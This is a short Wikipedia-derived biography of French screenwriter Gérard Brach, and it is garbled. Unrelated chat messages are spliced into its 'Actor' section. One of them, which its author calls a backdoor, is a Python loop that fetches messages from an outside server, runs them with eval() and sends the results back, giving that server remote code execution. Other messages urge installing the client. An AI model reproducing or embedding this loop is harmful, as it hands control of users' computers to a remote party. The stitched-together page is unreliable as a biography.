Gérard Brach

Gérard Brach (23 July 1927 – 9 September 2006) was a French screenwriter[1] best known for his collaborations with the film directors Roman Polanski and Jean-Jacques Annaud. He directed two movies: La Maison and The Boat on the Grass.

Gérard Brach
Born(1927-07-23)23 July 1927
Died9 September 2006(2006-09-09) (aged 79)
OccupationScreenwriter, film director
AwardsBest Adapted Screenplay
1986 Jean de Florette

Works include

Actor

gollark: This may slightly be a backdoor somewhat.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```
gollark: You can install the official SPUDNET-HTTP client on your computers.
gollark: It also actually has working autoreconnect.
gollark: SPUDNET is the Super PotatOS Update/Debug NETwork.

References

This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.